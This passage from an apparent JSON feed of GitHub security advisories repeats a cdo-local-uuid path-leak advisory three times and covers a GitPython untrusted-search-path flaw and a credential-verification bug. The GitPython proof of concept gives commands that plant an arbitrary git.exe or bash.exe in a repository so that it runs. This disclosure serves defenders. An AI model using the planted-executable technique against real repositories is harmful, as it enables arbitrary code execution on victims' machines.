href=\"https://github.com/casework/CASE-Utilities-Python/commit/e4ffadc3d56fd303b8f465d727c4a58213d311a1\">https://github.com/casework/CASE-Utilities-Python/commit/e4ffadc3d56fd303b8f465d727c4a58213d311a1</a></li>\n<li><a href=\"https://github.com/casework/CASE-Utilities-Python/commit/fca7388f09feccd3b9ea88e6df9c7a43a5349452\">https://github.com/casework/CASE-Utilities-Python/commit/fca7388f09feccd3b9ea88e6df9c7a43a5349452</a></li>\n<li><a href=\"https://github.com/casework/CASE-Utilities-Python/commit/fdc32414eccfcbde6be0fd91b7f491cc0779b02d#diff-e60b9cb8fb480ed27283a030a0898be3475992d78228f4045b12ce5cbb2f0509\">https://github.com/casework/CASE-Utilities-Python/commit/fdc32414eccfcbde6be0fd91b7f491cc0779b02d#diff-e60b9cb8fb480ed27283a030a0898be3475992d78228f4045b12ce5cbb2f0509</a></li>\n<li><a href=\"https://github.com/advisories/GHSA-rgrf-6mf5-m882\">https://github.com/advisories/GHSA-rgrf-6mf5-m882</a></li>\n</ul>\n",
            "url": "https://github.com/advisories/GHSA-rgrf-6mf5-m882",
            "title": "[case-utils] cdo-local-uuid vulnerable to insertion of artifact derived from developer's Present Working Directory into demonstration code",
            "date_modified": "2024-01-11T15:18:52.000Z",
            "date_published": "2024-01-11T15:18:51.000Z",
            "author": {
                "name": "GitHub",
                "url": "https://github.com/advisories/GHSA-rgrf-6mf5-m882"
            },
            "tags": [
                "severity"
            ]
        },
        {
            "content_html": "<h3 id=\"impact\">Impact</h3>\n<p><em>What kind of vulnerability is it? Who is impacted?</em></p>\n<p>An information leakage vulnerability is present in <a href=\"https://pypi.org/project/cdo-local-uuid/\"><code>cdo-local-uuid</code></a> at version <code>0.4.0</code>, and in <a href=\"https://pypi.org/project/case-utils/\"><code>case-utils</code></a> in unpatched versions (matching the pattern <code>0.x.0</code>) at and since <code>0.5.0</code>, before <code>0.15.0</code>.</p>\n<p>The vulnerability stems from a Python function, <code>cdo_local_uuid.local_uuid()</code>, and its original implementation <code>case_utils.local_uuid()</code>.  Henceforth, both will be called <code>local_uuid()</code>.</p>\n<p><code>local_uuid()</code> generates UUIDv5s using a deterministic pseudorandom number stream.  This was written to make graph application demonstrations generate consistent, version-controllable output with minimal noise caused by demonstration re-runs.  Part of the information used to keep individual examples' generated output distinct from one another is seed information from the caller's environment, particularly the program's argument vector.  The present working directory is also included as part of the seed information, but for reasons including maintaining user environment privacy, as well as keeping generated identifiers consistent regardless of where a source tree is housed on a user's file system, the present working directory is trimmed from the left to exclude path information outside of a supplied \"Top\" source directory.  (In context of the Make scripting language, this \"top\" directory is typically in a variable called <code>top_srcdir</code>.  In context of Git-based project management, this directory is expected to be the root directory of a freshly \"Cloned\" project, e.g., where <code>.git</code> is stored.)</p>\n<p>Under certain conditions, a user's present working directory, as an absolute path, was incorporated into seed data for the <code>local_uuid()</code> deterministic pseudorandom number stream.  This violates an expectation made in the documented purpose of the <code>local_uuid()</code> function, and leaks information about a calling user's environment.</p>\n<p>The conditions are:</p>\n<ul>\n<li>Given a project with top source directory <code>top_srcdir</code>, for instance <code>/home/user1/Documents/Project1</code>;</li>\n<li>Given a Python script housed directly in <code>top_srcdir</code>, for instance at <code>${top_srcdir}/example.py</code>, written to support the deterministic mode of <code>local_uuid()</code>;</li>\n<li>Given a call to that Python script that follows the documentation for <code>local_uuid()</code>;</li>\n</ul>\n<p>The absolute path for <code>top_srcdir</code> was then included in the seed information for the UUIDv5 stream, when what was intended was a relative path spelling.  That is, instead of <code>./example.py</code> being in the seed data, <code>/home/user1/Documents/Project1/example.py</code> was in the seed data.</p>\n<p>This does not leak the present working directory directly.  But, given other knowledge of how a program had been called to generate data using <code>local_uuid()</code> under these conditions, it becomes possible to determine that a chosen path can lead to a known UUIDv5 value.  Note that it is not necessarily knowable that the chosen path is the <em>only</em> solution to a sequence reconstruction; but, the path can be confirmed to be <em>a</em> solution.</p>\n<h3 id=\"patches\">Patches</h3>\n<p><em>Has the problem been patched? What versions should users upgrade to?</em></p>\n<p>The issue has been patched, in the <code>cdo-local-uuid</code> source repository and the <code>case-utils</code> source repository.</p>\n<p>Users should upgrade to any of these versions minimally:</p>\n<ul>\n<li><code>case-utils == 0.5.1</code></li>\n<li><code>case-utils == 0.6.1</code></li>\n<li><code>case-utils == 0.7.1</code></li>\n<li><code>case-utils == 0.8.1</code></li>\n<li><code>case-utils == 0.9.1</code></li>\n<li><code>case-utils == 0.10.1</code></li>\n<li><code>case-utils == 0.11.1</code></li>\n<li><code>case-utils == 0.12.1</code></li>\n<li><code>case-utils == 0.13.1</code></li>\n<li><code>case-utils == 0.14.1</code></li>\n<li><code>case-utils &gt;= 0.15.0</code></li>\n<li><code>cdo-local-uuid == 0.5.0</code></li>\n</ul>\n<p>All <code>case-utils</code> releases that contain the patch have the commit <code>ea630cce66b26dae6d7fa7e02451d6e25456a5f2</code> in their Git history.  Anyone interested in confirming the presence of this commit in a certain branch or tag can run the following test (written in Bash), substituting the desired branch name for the assigned value of <code>my_git_ref_of_interest</code>:</p>\n<pre><code class=\"language-bash\">#!/bin/bash\n# Present working directory ($PWD) should be in a clone of this repository:\n# https://github.com/casework/CASE-Utilities-Python\nmy_git_ref_of_interest=main\ntest \\\n  \"xea630cce66b26dae6d7fa7e02451d6e25456a5f2\" \\\n  == \\\n  \"x$(git merge-base ea630cc ${my_git_ref_of_interest})\"\necho $?  # Should print '0'\n</code></pre>\n<p>Note that other releases have been posted atop some of those minimal versions recommended for upgrading, named, e.g., <code>0.5.1.post0</code>.  These releases were posted to update internal library version numbers, and otherwise contain no functional changes, in accordance with Python Packaging guidance:</p>\n<ul>\n<li><a href=\"https://packaging.python.org/en/latest/specifications/version-specifiers/#post-release-separators\">https://packaging.python.org/en/latest/specifications/version-specifiers/#post-release-separators</a></li>\n</ul>\n<h3 id=\"workarounds\">Workarounds</h3>\n<p><em>Is there a way for users to fix or remediate the vulnerability without upgrading?</em></p>\n<p>If the script calling <code>cdo_local_uuid.local_uuid()</code> is moved out of the \"Top\" source directory, the issue is addressed.</p>\n<h3 id=\"references\">References</h3>\n<p><em>Are there any links users can visit to find out more?</em></p>\n<p>The issue is addressed in this Pull Request:</p>\n<ul>\n<li><a href=\"https://github.com/Cyber-Domain-Ontology/CDO-Utility-Local-UUID/pull/3\">https://github.com/Cyber-Domain-Ontology/CDO-Utility-Local-UUID/pull/3</a></li>\n</ul>\n<p>Tests to reproduce the issue's conditions and confirm it has been addressed are in this Pull Requested:</p>\n<ul>\n<li><a href=\"https://github.com/Cyber-Domain-Ontology/CDO-Utility-Local-UUID/pull/4\">https://github.com/Cyber-Domain-Ontology/CDO-Utility-Local-UUID/pull/4</a></li>\n</ul>\n\n<h3 id=\"references-1\">References</h3>\n<ul>\n<li><a href=\"https://github.com/Cyber-Domain-Ontology/CDO-Utility-Local-UUID/security/advisories/GHSA-rgrf-6mf5-m882\">https://github.com/Cyber-Domain-Ontology/CDO-Utility-Local-UUID/security/advisories/GHSA-rgrf-6mf5-m882</a></li>\n<li><a href=\"https://nvd.nist.gov/vuln/detail/CVE-2024-22194\">https://nvd.nist.gov/vuln/detail/CVE-2024-22194</a></li>\n<li><a href=\"https://github.com/Cyber-Domain-Ontology/CDO-Utility-Local-UUID/pull/3\">https://github.com/Cyber-Domain-Ontology/CDO-Utility-Local-UUID/pull/3</a></li>\n<li><a href=\"https://github.com/Cyber-Domain-Ontology/CDO-Utility-Local-UUID/pull/4\">https://github.com/Cyber-Domain-Ontology/CDO-Utility-Local-UUID/pull/4</a></li>\n<li><a href=\"https://github.com/Cyber-Domain-Ontology/CDO-Utility-Local-UUID/commit/9e78f7cb1075728d0aafc918514f32a1392cd235\">https://github.com/Cyber-Domain-Ontology/CDO-Utility-Local-UUID/commit/9e78f7cb1075728d0aafc918514f32a1392cd235</a></li>\n<li><a href=\"https://github.com/casework/CASE-Utilities-Python/commit/00864cd12de7c50d882dd1a74915d32e939c25f9\">https://github.com/casework/CASE-Utilities-Python/commit/00864cd12de7c50d882dd1a74915d32e939c25f9</a></li>\n<li><a href=\"https://github.com/casework/CASE-Utilities-Python/commit/1cccae8eb3cf94b3a28f6490efa0fbf5c82ebd6b\">https://github.com/casework/CASE-Utilities-Python/commit/1cccae8eb3cf94b3a28f6490efa0fbf5c82ebd6b</a></li>\n<li><a href=\"https://github.com/casework/CASE-Utilities-Python/commit/5acb929dfb599709d1c8c90d1824dd79e0fd9e10\">https://github.com/casework/CASE-Utilities-Python/commit/5acb929dfb599709d1c8c90d1824dd79e0fd9e10</a></li>\n<li><a href=\"https://github.com/casework/CASE-Utilities-Python/commit/7e02d18383eabbeb9fb4ec97d81438c9980a4790\">https://github.com/casework/CASE-Utilities-Python/commit/7e02d18383eabbeb9fb4ec97d81438c9980a4790</a></li>\n<li><a href=\"https://github.com/casework/CASE-Utilities-Python/commit/80551f49241c874c7c50e14abe05c5017630dad2\">https://github.com/casework/CASE-Utilities-Python/commit/80551f49241c874c7c50e14abe05c5017630dad2</a></li>\n<li><a href=\"https://github.com/casework/CASE-Utilities-Python/commit/939775f956796d0432ecabbf62782ed7ad1007b5\">https://github.com/casework/CASE-Utilities-Python/commit/939775f956796d0432ecabbf62782ed7ad1007b5</a></li>\n<li><a href=\"https://github.com/casework/CASE-Utilities-Python/commit/db428a0745dac4fdd888ced9c52f617695519f9d\">https://github.com/casework/CASE-Utilities-Python/commit/db428a0745dac4fdd888ced9c52f617695519f9d</a></li>\n<li><a href=\"https://github.com/casework/CASE-Utilities-Python/commit/e4ffadc3d56fd303b8f465d727c4a58213d311a1\">https://github.com/casework/CASE-Utilities-Python/commit/e4ffadc3d56fd303b8f465d727c4a58213d311a1</a></li>\n<li><a href=\"https://github.com/casework/CASE-Utilities-Python/commit/fca7388f09feccd3b9ea88e6df9c7a43a5349452\">https://github.com/casework/CASE-Utilities-Python/commit/fca7388f09feccd3b9ea88e6df9c7a43a5349452</a></li>\n<li><a href=\"https://github.com/casework/CASE-Utilities-Python/commit/fdc32414eccfcbde6be0fd91b7f491cc0779b02d#diff-e60b9cb8fb480ed27283a030a0898be3475992d78228f4045b12ce5cbb2f0509\">https://github.com/casework/CASE-Utilities-Python/commit/fdc32414eccfcbde6be0fd91b7f491cc0779b02d#diff-e60b9cb8fb480ed27283a030a0898be3475992d78228f4045b12ce5cbb2f0509</a></li>\n<li><a href=\"https://github.com/advisories/GHSA-rgrf-6mf5-m882\">https://github.com/advisories/GHSA-rgrf-6mf5-m882</a></li>\n</ul>\n",
            "url": "https://github.com/advisories/GHSA-rgrf-6mf5-m882",
            "title": "[case-utils] cdo-local-uuid vulnerable to insertion of artifact derived from developer's Present Working Directory into demonstration code",
            "date_modified": "2024-01-11T15:18:52.000Z",
            "date_published": "2024-01-11T15:18:51.000Z",
            "author": {
                "name": "GitHub",
                "url": "https://github.com/advisories/GHSA-rgrf-6mf5-m882"
            },
            "tags": [
                "severity"
            ]
        },
        {
            "content_html": "<h3 id=\"impact\">Impact</h3>\n<p><em>What kind of vulnerability is it? Who is impacted?</em></p>\n<p>An information leakage vulnerability is present in <a href=\"https://pypi.org/project/cdo-local-uuid/\"><code>cdo-local-uuid</code></a> at version <code>0.4.0</code>, and in <a href=\"https://pypi.org/project/case-utils/\"><code>case-utils</code></a> in unpatched versions (matching the pattern <code>0.x.0</code>) at and since <code>0.5.0</code>, before <code>0.15.0</code>.</p>\n<p>The vulnerability stems from a Python function, <code>cdo_local_uuid.local_uuid()</code>, and its original implementation <code>case_utils.local_uuid()</code>.  Henceforth, both will be called <code>local_uuid()</code>.</p>\n<p><code>local_uuid()</code> generates UUIDv5s using a deterministic pseudorandom number stream.  This was written to make graph application demonstrations generate consistent, version-controllable output with minimal noise caused by demonstration re-runs.  Part of the information used to keep individual examples' generated output distinct from one another is seed information from the caller's environment, particularly the program's argument vector.  The present working directory is also included as part of the seed information, but for reasons including maintaining user environment privacy, as well as keeping generated identifiers consistent regardless of where a source tree is housed on a user's file system, the present working directory is trimmed from the left to exclude path information outside of a supplied \"Top\" source directory.  (In context of the Make scripting language, this \"top\" directory is typically in a variable called <code>top_srcdir</code>.  In context of Git-based project management, this directory is expected to be the root directory of a freshly \"Cloned\" project, e.g., where <code>.git</code> is stored.)</p>\n<p>Under certain conditions, a user's present working directory, as an absolute path, was incorporated into seed data for the <code>local_uuid()</code> deterministic pseudorandom number stream.  This violates an expectation made in the documented purpose of the <code>local_uuid()</code> function, and leaks information about a calling user's environment.</p>\n<p>The conditions are:</p>\n<ul>\n<li>Given a project with top source directory <code>top_srcdir</code>, for instance <code>/home/user1/Documents/Project1</code>;</li>\n<li>Given a Python script housed directly in <code>top_srcdir</code>, for instance at <code>${top_srcdir}/example.py</code>, written to support the deterministic mode of <code>local_uuid()</code>;</li>\n<li>Given a call to that Python script that follows the documentation for <code>local_uuid()</code>;</li>\n</ul>\n<p>The absolute path for <code>top_srcdir</code> was then included in the seed information for the UUIDv5 stream, when what was intended was a relative path spelling.  That is, instead of <code>./example.py</code> being in the seed data, <code>/home/user1/Documents/Project1/example.py</code> was in the seed data.</p>\n<p>This does not leak the present working directory directly.  But, given other knowledge of how a program had been called to generate data using <code>local_uuid()</code> under these conditions, it becomes possible to determine that a chosen path can lead to a known UUIDv5 value.  Note that it is not necessarily knowable that the chosen path is the <em>only</em> solution to a sequence reconstruction; but, the path can be confirmed to be <em>a</em> solution.</p>\n<h3 id=\"patches\">Patches</h3>\n<p><em>Has the problem been patched? What versions should users upgrade to?</em></p>\n<p>The issue has been patched, in the <code>cdo-local-uuid</code> source repository and the <code>case-utils</code> source repository.</p>\n<p>Users should upgrade to any of these versions minimally:</p>\n<ul>\n<li><code>case-utils == 0.5.1</code></li>\n<li><code>case-utils == 0.6.1</code></li>\n<li><code>case-utils == 0.7.1</code></li>\n<li><code>case-utils == 0.8.1</code></li>\n<li><code>case-utils == 0.9.1</code></li>\n<li><code>case-utils == 0.10.1</code></li>\n<li><code>case-utils == 0.11.1</code></li>\n<li><code>case-utils == 0.12.1</code></li>\n<li><code>case-utils == 0.13.1</code></li>\n<li><code>case-utils == 0.14.1</code></li>\n<li><code>case-utils &gt;= 0.15.0</code></li>\n<li><code>cdo-local-uuid == 0.5.0</code></li>\n</ul>\n<p>All <code>case-utils</code> releases that contain the patch have the commit <code>ea630cce66b26dae6d7fa7e02451d6e25456a5f2</code> in their Git history.  Anyone interested in confirming the presence of this commit in a certain branch or tag can run the following test (written in Bash), substituting the desired branch name for the assigned value of <code>my_git_ref_of_interest</code>:</p>\n<pre><code class=\"language-bash\">#!/bin/bash\n# Present working directory ($PWD) should be in a clone of this repository:\n# https://github.com/casework/CASE-Utilities-Python\nmy_git_ref_of_interest=main\ntest \\\n  \"xea630cce66b26dae6d7fa7e02451d6e25456a5f2\" \\\n  == \\\n  \"x$(git merge-base ea630cc ${my_git_ref_of_interest})\"\necho $?  # Should print '0'\n</code></pre>\n<p>Note that other releases have been posted atop some of those minimal versions recommended for upgrading, named, e.g., <code>0.5.1.post0</code>.  These releases were posted to update internal library version numbers, and otherwise contain no functional changes, in accordance with Python Packaging guidance:</p>\n<ul>\n<li><a href=\"https://packaging.python.org/en/latest/specifications/version-specifiers/#post-release-separators\">https://packaging.python.org/en/latest/specifications/version-specifiers/#post-release-separators</a></li>\n</ul>\n<h3 id=\"workarounds\">Workarounds</h3>\n<p><em>Is there a way for users to fix or remediate the vulnerability without upgrading?</em></p>\n<p>If the script calling <code>cdo_local_uuid.local_uuid()</code> is moved out of the \"Top\" source directory, the issue is addressed.</p>\n<h3 id=\"references\">References</h3>\n<p><em>Are there any links users can visit to find out more?</em></p>\n<p>The issue is addressed in this Pull Request:</p>\n<ul>\n<li><a href=\"https://github.com/Cyber-Domain-Ontology/CDO-Utility-Local-UUID/pull/3\">https://github.com/Cyber-Domain-Ontology/CDO-Utility-Local-UUID/pull/3</a></li>\n</ul>\n<p>Tests to reproduce the issue's conditions and confirm it has been addressed are in this Pull Requested:</p>\n<ul>\n<li><a href=\"https://github.com/Cyber-Domain-Ontology/CDO-Utility-Local-UUID/pull/4\">https://github.com/Cyber-Domain-Ontology/CDO-Utility-Local-UUID/pull/4</a></li>\n</ul>\n\n<h3 id=\"references-1\">References</h3>\n<ul>\n<li><a href=\"https://github.com/Cyber-Domain-Ontology/CDO-Utility-Local-UUID/security/advisories/GHSA-rgrf-6mf5-m882\">https://github.com/Cyber-Domain-Ontology/CDO-Utility-Local-UUID/security/advisories/GHSA-rgrf-6mf5-m882</a></li>\n<li><a href=\"https://nvd.nist.gov/vuln/detail/CVE-2024-22194\">https://nvd.nist.gov/vuln/detail/CVE-2024-22194</a></li>\n<li><a href=\"https://github.com/Cyber-Domain-Ontology/CDO-Utility-Local-UUID/pull/3\">https://github.com/Cyber-Domain-Ontology/CDO-Utility-Local-UUID/pull/3</a></li>\n<li><a href=\"https://github.com/Cyber-Domain-Ontology/CDO-Utility-Local-UUID/pull/4\">https://github.com/Cyber-Domain-Ontology/CDO-Utility-Local-UUID/pull/4</a></li>\n<li><a href=\"https://github.com/Cyber-Domain-Ontology/CDO-Utility-Local-UUID/commit/9e78f7cb1075728d0aafc918514f32a1392cd235\">https://github.com/Cyber-Domain-Ontology/CDO-Utility-Local-UUID/commit/9e78f7cb1075728d0aafc918514f32a1392cd235</a></li>\n<li><a href=\"https://github.com/casework/CASE-Utilities-Python/commit/00864cd12de7c50d882dd1a74915d32e939c25f9\">https://github.com/casework/CASE-Utilities-Python/commit/00864cd12de7c50d882dd1a74915d32e939c25f9</a></li>\n<li><a href=\"https://github.com/casework/CASE-Utilities-Python/commit/1cccae8eb3cf94b3a28f6490efa0fbf5c82ebd6b\">https://github.com/casework/CASE-Utilities-Python/commit/1cccae8eb3cf94b3a28f6490efa0fbf5c82ebd6b</a></li>\n<li><a href=\"https://github.com/casework/CASE-Utilities-Python/commit/5acb929dfb599709d1c8c90d1824dd79e0fd9e10\">https://github.com/casework/CASE-Utilities-Python/commit/5acb929dfb599709d1c8c90d1824dd79e0fd9e10</a></li>\n<li><a href=\"https://github.com/casework/CASE-Utilities-Python/commit/7e02d18383eabbeb9fb4ec97d81438c9980a4790\">https://github.com/casework/CASE-Utilities-Python/commit/7e02d18383eabbeb9fb4ec97d81438c9980a4790</a></li>\n<li><a href=\"https://github.com/casework/CASE-Utilities-Python/commit/80551f49241c874c7c50e14abe05c5017630dad2\">https://github.com/casework/CASE-Utilities-Python/commit/80551f49241c874c7c50e14abe05c5017630dad2</a></li>\n<li><a href=\"https://github.com/casework/CASE-Utilities-Python/commit/939775f956796d0432ecabbf62782ed7ad1007b5\">https://github.com/casework/CASE-Utilities-Python/commit/939775f956796d0432ecabbf62782ed7ad1007b5</a></li>\n<li><a href=\"https://github.com/casework/CASE-Utilities-Python/commit/db428a0745dac4fdd888ced9c52f617695519f9d\">https://github.com/casework/CASE-Utilities-Python/commit/db428a0745dac4fdd888ced9c52f617695519f9d</a></li>\n<li><a href=\"https://github.com/casework/CASE-Utilities-Python/commit/e4ffadc3d56fd303b8f465d727c4a58213d311a1\">https://github.com/casework/CASE-Utilities-Python/commit/e4ffadc3d56fd303b8f465d727c4a58213d311a1</a></li>\n<li><a href=\"https://github.com/casework/CASE-Utilities-Python/commit/fca7388f09feccd3b9ea88e6df9c7a43a5349452\">https://github.com/casework/CASE-Utilities-Python/commit/fca7388f09feccd3b9ea88e6df9c7a43a5349452</a></li>\n<li><a href=\"https://github.com/casework/CASE-Utilities-Python/commit/fdc32414eccfcbde6be0fd91b7f491cc0779b02d#diff-e60b9cb8fb480ed27283a030a0898be3475992d78228f4045b12ce5cbb2f0509\">https://github.com/casework/CASE-Utilities-Python/commit/fdc32414eccfcbde6be0fd91b7f491cc0779b02d#diff-e60b9cb8fb480ed27283a030a0898be3475992d78228f4045b12ce5cbb2f0509</a></li>\n<li><a href=\"https://github.com/advisories/GHSA-rgrf-6mf5-m882\">https://github.com/advisories/GHSA-rgrf-6mf5-m882</a></li>\n</ul>\n",
            "url": "https://github.com/advisories/GHSA-rgrf-6mf5-m882",
            "title": "[cdo-local-uuid] cdo-local-uuid vulnerable to insertion of artifact derived from developer's Present Working Directory into demonstration code",
            "date_modified": "2024-01-11T15:18:52.000Z",
            "date_published": "2024-01-11T15:18:51.000Z",
            "author": {
                "name": "GitHub",
                "url": "https://github.com/advisories/GHSA-rgrf-6mf5-m882"
            },
            "tags": [
                "severity"
            ]
        },
        {
            "content_html": "<h3 id=\"summary\">Summary</h3>\n<p>This issue exists because of an incomplete fix for CVE-2023-40590. On Windows, GitPython uses an untrusted search path if it uses a shell to run <code>git</code>, as well as when it runs <code>bash.exe</code> to interpret hooks. If either of those features are used on Windows, a malicious <code>git.exe</code> or <code>bash.exe</code> may be run from an untrusted repository.</p>\n<h3 id=\"details\">Details</h3>\n<p>Although GitPython often avoids executing programs found in an untrusted search path since 3.1.33, two situations remain where this still occurs. Either can allow arbitrary code execution under some circumstances.</p>\n<h4 id=\"when-a-shell-is-used\">When a shell is used</h4>\n<p>GitPython can be told to run <code>git</code> commands through a shell rather than as direct subprocesses, by passing <code>shell=True</code> to any method that accepts it, or by both setting <code>Git.USE_SHELL = True</code> and not passing <code>shell=False</code>. Then the Windows <code>cmd.exe</code> shell process performs the path search, ad GitPython does not prevent that shell from finding and running <code>git</code> in the current directory.</p>\n<p>When GitPython runs <code>git</code> directly rather than through a shell, the GitPython process performs the path search, and currently omits the current directory by setting <code>NoDefaultCurrentDirectoryInExePath</code> in its own environment during the <code>Popen</code> call. Although the <code>cmd.exe</code> shell will honor this environment variable when present, GitPython does not not currently pass it into the shell subprocess's environment.</p>\n<p>Furthermore, because GitPython sets the subprocess CWD to the root of a repository's working tree, using a shell will run a malicious <code>git.exe</code> in an untrusted repository even if GitPython itself is run from a trusted location.</p>\n<p>This also applies if <code>Git.execute</code> is called directly with <code>shell=True</code> (or after <code>Git.USE_SHELL = True</code>) to run any command.</p>\n<h4 id=\"when-hook-scripts-are-run\">When hook scripts are run</h4>\n<p>On Windows, GitPython uses <code>bash.exe</code> to run hooks that appear to be scripts. However, unlike when running git, no steps are taken to avoid finding and running <code>bash.exe</code> in the current directory.</p>\n<p>This allows the author of an untrusted fork or branch to cause a malicious <code>bash.exe</code> to be run in some otherwise safe workflows. An example of such a scenario is if the user installs a trusted hook while on a trusted branch, then switches to an untrusted feature branch (possibly from a fork) to review proposed changes. If the untrusted feature branch contains a malicious <code>bash.exe</code> and the user's current working directory is the working tree, and the user performs an action that runs the hook, then although the hook itself is uncorrupted, it runs with the malicious <code>bash.exe</code>.</p>\n<p>Note that, while <code>bash.exe</code> is a shell, this is a separate scenario from when <code>git</code> is run using the unrelated Windows <code>cmd.exe</code> shell.</p>\n<h3 id=\"poc\">PoC</h3>\n<p>On Windows, create a <code>git.exe</code> file in a repository. Then create a <code>Repo</code> object, and call any method through it (directly or indirectly) that supports the <code>shell</code> keyword argument with <code>shell=True</code>:</p>\n<pre><code class=\"language-powershell\">mkdir testrepo\ngit init testrepo\ncp ... testrepo\\git.exe  # Replace \"...\" with any executable of choice.\npython -c \"import git; print(git.Repo('testrepo').git.version(shell=True))\"\n</code></pre>\n<p>The <code>git.exe</code> executable in the repository directory will be run.</p>\n<p>Or use no <code>Repo</code> object, but do it from the location with the <code>git.exe</code>:</p>\n<pre><code class=\"language-powershell\">cd testrepo\npython -c \"import git; print(git.Git().version(shell=True))\"\n</code></pre>\n<p>The <code>git.exe</code> executable in the current directory will be run.</p>\n<p>For the scenario with hooks, install a hook in a repository, create a <code>bash.exe</code> file in the current directory, and perform an operation that causes GitPython to attempt to run the hook:</p>\n<pre><code class=\"language-powershell\">mkdir testrepo\ncd testrepo\ngit init\nmv .git/hooks/pre-commit.sample .git/hooks/pre-commit\ncp ... bash.exe  # Replace \"...\" with any executable of choice.\necho \"Some text\" &gt;file.txt\ngit add file.txt\npython -c \"import git; git.Repo().index.commit('Some message')\"\n</code></pre>\n<p>The <code>bash.exe</code> executable in the current directory will be run.</p>\n<h3 id=\"impact\">Impact</h3>\n<p>The greatest impact is probably in applications that set <code>Git.USE_SHELL = True</code> for historical reasons. (Undesired console windows had, in the past, been created in some kinds of applications, when it was not used.) Such an application may be vulnerable to arbitrary code execution from a malicious repository, even with no other exacerbating conditions. This is to say that, if a shell is used to run <code>git</code>, the full effect of CVE-2023-40590 is still present. Furthermore, as noted above, running the application itself from a trusted directory is not a sufficient mitigation.</p>\n<p>An application that does not direct GitPython to use a shell to run <code>git</code> subprocesses thus avoids most of the risk. However, there is no such straightforward way to prevent GitPython from running <code>bash.exe</code> to interpret hooks. So while the conditions needed for that to be exploited are more involved, it may be harder to mitigate decisively prior to patching.</p>\n<h3 id=\"possible-solutions\">Possible solutions</h3>\n<p>A straightforward approach would be to address each bug directly:</p>\n<ul>\n<li>Pass <code>NoDefaultCurrentDirectoryInExePath</code> into the subprocess environment, when a shell is used, since then the subprocess is the <code>cmd.exe</code> shell that actually performs the path search.</li>\n<li>Set <code>NoDefaultCurrentDirectoryInExePath</code> in the GitPython process environment during the <code>Popen</code> call made to run hooks with a <code>bash.exe</code> subprocess.</li>\n</ul>\n<p>These need only be done on Windows.</p>\n<h3 id=\"references\">References</h3>\n<ul>\n<li><a href=\"https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-2mqj-m65w-jghx\">https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-2mqj-m65w-jghx</a></li>\n<li><a href=\"https://github.com/gitpython-developers/GitPython/pull/1792\">https://github.com/gitpython-developers/GitPython/pull/1792</a></li>\n<li><a href=\"https://github.com/gitpython-developers/GitPython/commit/ef3192cc414f2fd9978908454f6fd95243784c7f\">https://github.com/gitpython-developers/GitPython/commit/ef3192cc414f2fd9978908454f6fd95243784c7f</a></li>\n<li><a href=\"https://nvd.nist.gov/vuln/detail/CVE-2024-22190\">https://nvd.nist.gov/vuln/detail/CVE-2024-22190</a></li>\n<li><a href=\"https://github.com/advisories/GHSA-2mqj-m65w-jghx\">https://github.com/advisories/GHSA-2mqj-m65w-jghx</a></li>\n</ul>\n",
            "url": "https://github.com/advisories/GHSA-2mqj-m65w-jghx",
            "title": "[GitPython] Untrusted search path under some conditions on Windows allows arbitrary code execution",
            "date_modified": "2024-01-11T15:41:58.000Z",
            "date_published": "2024-01-10T15:46:00.000Z",
            "author": {
                "name": "GitHub",
                "url": "https://github.com/advisories/GHSA-2mqj-m65w-jghx"
            },
            "tags": [
                "severity"
            ]
        },
        {
            "content_html": "<h3 id=\"impact\">Impact</h3>\n<p>When verifying W3C Format Verifiable Credentials using JSON-LD with Linked Data Proofs (LDP-VCs), the result of verifying the presentation <code>document.proof</code> was not factored into the final <code>verified</code> value (<code>true</code>/<code>false</code>) on the presentation record. Below is an example result from verifying a JSON-LD Presentation where there is an error noted in the processing (mismatched challenge), but the overall result is incorrectly <code>\"verified\": true</code>:</p>\n<pre><code class=\"language-json\">{\n  \"verified\": true,\n  \"presentation_result\": {\n    \"verified\": false,\n    \"document\": {\n      \"@context\": [\n        \"https://www.w3.org/2018/credentials/v1\"\n      ],\n      \"type\": [\n        \"VerifiablePresentation\"\n      ],\n      \"verifiableCredential\": [\n        {\n          \"@context\": [\n            \"https://www.w3.org/2018/credentials/v1\",\n            \"https://w3id.org/citizenship/v1\"\n          ],\n          \"type\": [\n            \"VerifiableCredential\",\n            \"PermanentResident\"\n          ],\n          \"issuer\": \"did:sov:EzcfrVw7Tveho5NjrmDWnd\",\n          \"issuanceDate\": \"2023-11-18\",\n          \"credentialSubject\": {\n            \"type\": [\n              \"PermanentResident\"\n            ],\n            \"id\": \"did:key:z6MkrpbudRMUpTWSdqFcG2ytbYu2QQfgGFUf8GJpShR8Gy7C\",\n            \"givenName\": \"Bob\",\n            \"familyName\": \"Builder\",\n            \"gender\": \"Male\",\n            \"birthCountry\": \"Bahamas\",\n            \"birthDate\": \"1958-07-17\"\n          },\n          \"proof\": {\n            \"type\": \"Ed25519Signature2018\",\n            \"proofPurpose\": \"assertionMethod\",\n            \"verificationMethod\": \"did:sov:EzcfrVw7Tveho5NjrmDWnd#key-1\",\n            \"created\": \"2023-11-18T21:39:56.988853+00:00\",\n            \"jws\": \"eyJhbGciOiAiRWREU0EiLCAiYjY0IjogZmFsc2UsICJjcml0IjogWyJiNjQiXX0..eKdLMhKJkiVNzTKOEv14KyAFJnk8QX5MqXPmRE5OjQvwRNkeXk1lQRovhDhXKw154OrSqLHgfSNwBd3xfwuDCA\"\n          }\n        }\n      ],\n      \"proof\": {\n        \"type\": \"Ed25519Signature2018\",\n        \"proofPurpose\": \"authentication\",\n        \"verificationMethod\": \"did:key:z6MkrpbudRMUpTWSdqFcG2ytbYu2QQfgGFUf8GJpShR8Gy7C#z6MkrpbudRMUpTWSdqFcG2ytbYu2QQfgGFUf8GJpShR8Gy7C\",\n        \"created\": \"2023-11-18T21:39:59.188276+00:00\",\n        \"challenge\": \"ce0956d4-206d-4b69-a087-52bbb9ddaf1d\",\n        \"jws\": \"eyJhbGciOiAiRWREU0EiLCAiYjY0IjogZmFsc2UsICJjcml0IjogWyJiNjQiXX0..4ciLzT3oF-Ch9nngGVgI_fBNIo_RPPXzRuFXjMx4AdwVNM4ioeB3TNDbHsF7fPXANznkZR0bHceyvMN3-CUSAw\"\n      }\n    },\n    \"results\": [\n      {\n        \"verified\": false,\n        \"proof\": {\n          \"@context\": [\n            \"https://www.w3.org/2018/credentials/v1\"\n          ],\n          \"type\": \"Ed25519Signature2018\",\n          \"proofPurpose\": \"authentication\",\n          \"verificationMethod\": 